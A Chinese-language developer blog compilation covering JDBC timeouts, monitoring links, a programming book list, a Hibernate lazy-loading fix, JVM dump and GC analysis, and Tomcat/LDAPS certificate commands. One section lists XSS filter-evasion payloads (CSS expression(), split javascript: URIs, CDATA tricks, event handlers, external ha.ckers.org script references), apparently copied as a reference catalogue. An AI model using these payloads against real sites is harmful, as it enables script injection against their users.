深入理解JDBC的超時設置

文章來源 http://www.importnew.com/2466.html

使用 Grafana+collectd+InfluxDB 監控系統

http://cyrilwang.blogspot.tw/2016/09/collectd-influxdb-grafana.html

使用 Grafana+collectd+InfluxDB 打造现代监控系统

[轉] 每位認真的程式設計師都要讀的10本經典書

1. 英文:  The Pragmatic Programmer-From Journeyman to Master
中文: 程序員修煉之道︰從小工到專家︰評注版

2. 英文: The Mythical Man-Month: Essays on Software Engineering, Anniversary Edition (2nd Edition)
中文: 人月神話:軟體專案管理之道(20週年)

3. 英文: Clean Code: A Handbook of Agile Software Craftsmanship
中文: 無瑕的程式碼-敏捷軟體開發技巧守則

4. 英文: The Clean Coder: A Code of Conduct for Professional Programmers (Robert C. Martin Series)
中文:  無瑕的程式碼番外篇-專業程式設計師的生存之道

5. 英文: Refactoring: Improving the Design of Existing Code
中文: 重構─改善既有程式的設計, 2/e

6. 英文: Working Effectively with Legacy Code
中文: 修改代碼的藝術

7. 英文: Code Complete: A Practical Handbook of Software Construction, Second Edition
中文: 代碼大全 2

8. 英文: Head First Design Patterns
中文:  深入淺出設計模式 

9. 英文:  Peopleware: Productive Projects and Teams (3rd Edition)
中文:  Peopleware:腦力密集產業的人才管理之道(增訂版) 

10. Soft Skills: The software developer’s life manual

參考來源:http://softnshare.wordpress.com/2016/02/24/每位認真的程式設計師都要讀的10本經典書/

[Security] XSS攻擊手法介紹

1. 改變字元大小寫
    alert(‘d’)

2. 利用多加一些其它字元來規避Regular Expression的檢查
    <alert(‘c’)//
    http://t.js
    " SRC="t.js">
    http://t.js
    ‘" SRC="t.js">
    ` SRC="t.js">
    http://t.js

3. 以其它副檔名取代.js
    http://bad.jpg

4. 將Javascript寫在CSS檔裡
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
       example:
          body {
               background-image: url(‘javascript:alert(“XSS");’)
          }

5. 在script的tag裡加入一些其它字元
   
    http://t.js

6. 使用tab或是new line來規避
    <img src="jav ascr ipt:alert(‘XSS3’)">
    <img src="jav ascr ipt:alert(‘XSS3’)">
    <IMG SRC="jav ascript:alert(‘XSS’);">
         -> tag
         -> new line

7. 使用"\"來規避
    <STYLE>@im\port’\ja\vasc\ript:alert(“XSS32″)’;</STYLE>
    <IMG STYLE=’xss:expre\ssion(alert(“XSS33″))’>
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31’));">
    <A STYLE=’no\xss:noxss(“*//*"); xss:ex/*XSS*//*/*/pression(alert(“XSS"))’>

8. 使用Hex encode來規避(也可能會把";"拿掉)
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31’));">
        原始碼:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31’));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
        原始碼:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

9. script in HTML tag
    <body onload=」alert(‘onload’)」>
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. 在swf裡含有xss的code
    http://ha.ckers.org/xss.swf

11. 利用CDATA將xss的code拆開,再組合起來。
    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(‘XSS’);">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. 利用HTML+TIME。
    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2″>
    <t:set attributeName="innerHTML" to="anywordalert(“XSS")">
    </BODY></HTML>

13. 透過META寫入Cookie。
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)">

14. javascript in src , href , url
   
    <img src="javascript:alert(‘XSS3’)">
    <IMG DYNSRC="javascript:alert(‘XSS20’)">
    <IMG LOWSRC="javascript:alert(‘XSS21’)">
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24’);">
   
    <TABLE BACKGROUND="javascript:alert(‘XSS29’)">
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30’))">
    <STYLE TYPE="text/css">.XSS{background image:url(“javascript:alert(‘XSS35’)");}
    </STYLE><A CLASS=XSS></A>
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>

文章來源: Cross Site Scripting(XSS)攻擊手法介紹
http://htmlpurifier.org/live/smoketests/xssAttacks.php

Java Hibernate.initialize() issue

最近同事遇到備份table(Model)某些幾筆資料會處於lazyinitializer狀態,欄位全是null的情形,
這幾筆正好都是在之前有get過其他Model然後該Model有@ManyToOne關連到這個table的,
由於是直接用dao.list()撈出來,dao裡面是單純的用session.createCriteria(clazz).list()做,
奇怪的是即使已經做了Hibernate.initialize(XXX),用debug看撈出來的XXX屬性還是null,
正當百思不得其解時,我用debug看getter XXX方法,結果竟然有值!
原來Hibernate.initialize()是對proxy做initialze,不是對該Model直接賦予值,因此還是要從getter拿屬性才會是正確的,
然後再看同事的備份table方法,是撈出來的Model List直接透過new ObjectMapper().writeValueAsString(list)轉成json,
這個list並沒有經過getter拿屬性,因此才會有幾筆lazyinitializer的資料欄位是null,
其實fetch = FetchType.LAZY屬性Hibernate session會從proxyByKey的Hashmap拿,這種必須透過getter才能真正拿到值,
(只要宣告成fetch = FetchType.LAZY的屬性都有機會變null,@OneToMany的屬性也是一樣,只是@ManyToOne是每次必變null)

所以備份table issue總結如下:
解法1:
不要偷懶全部屬性都用getter,但這樣每個屬性都要寫…

解法2:
還是維持new ObjectMapper().writeValueAsString(list)
做dao.list()之前先session.clear() –> 強迫session中斷就可以更新model,注意flush()或refresh()也沒用,一定要用clear()

解法3:
把XXX屬性的@ManyToOne(fetch = FetchType.LAZY)改成FetchType.EAGER
這樣每次撈此Model都會順便直接初始化XXX屬性

中國聯通APN

中國聯通APN存取點: 3GNET

JVM分析的2個工具(JVisualVM&GCViewer)

看OutOfMemory:
a.加jvm參數:
-XX:+HeapDumpOnOutOfMemoryError
b.手動產生dump file: (模擬OutOfMemory發生, OOM產生檔案路徑: %TOMCAT_HOME%/bin/java_pid.hprof)
用jdk/bin下的jconsole打開pid
到 MBeans > com.sun.management > HotSpotDiagnostics > Operations |DumpHeap > p1輸入要產生的hprof檔名(預設是String, 檔案產生在jconsole同一層目錄)
c.用jdk/bin下的jvisualvm打開java_pid.hprof檔案

看GC log:
a.加jvm參數:
-verbose:gc -Xloggc:gc.log
b.執行tomcat (產生檔案路徑: %TOMCAT_HOME%/bin/gc.log)
c.下載GCViewer.jar用此工具打開gc.log

參考資料: JVM分析的2個工具
http://www.blogjava.net/fastzch/archive/2008/07/20/216240.html

OAuth 2.0 系列文目錄

https://blog.yorkxin.org/posts/2013/09/30/oauth2-1-introduction/

Web Security

HTTP Headers的資安議題:
http://devco.re/blog/2014/03/10/security-issues-of-http-headers-1/

防止CSRF攻擊:
http://blog.jdriven.com/2014/10/stateless-spring-security-part-1-stateless-csrf-protection/

幫Spring Security加上x-auth-token:
http://blog.jdriven.com/2014/10/stateless-spring-security-part-2-stateless-authentication/

弱點掃描軟體:
Burp Suite / N-Stalker / nessus

Authentication using certificates, Tomcat and Spring security

Use LDAPS for Spring Security:
http://l-lin.github.io/2014/09/09/Auth_with_certificates_Tomcat_spring/

– 顯示LDAPS certificate:
openssl s_client -showcerts -connect myserver:636
– 存成X509 certificate檔:
echo -n | openssl s_client -connect myserver:636 | sed -ne ‘/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p’ > myserver.crt

– 儲存certificate到JRE: (預設密碼:changeit)
keytool -import -keystore /opt/jdk7/jre/lib/security/cacerts -alias myserver -file myserver.crt
– 刪除certificate:
keytool -delete -alias myserver -keystore /opt/jdk7/jre/lib/security/cacerts -storepass changeit

– Client certificate over SSL
http://stackoverflow.com/questions/875467/java-client-certificates-over-https-ssl

-Djavax.net.ssl.keyStoreType=pkcs12
-Djavax.net.ssl.trustStoreType=jks
-Djavax.net.ssl.keyStore=clientcertificate.p12
-Djavax.net.ssl.trustStore=gridserver.keystore
-Djavax.net.debug=ssl # very verbose debug
-Djavax.net.ssl.keyStorePassword=$PASS
-Djavax.net.ssl.trustStorePassword=$PASS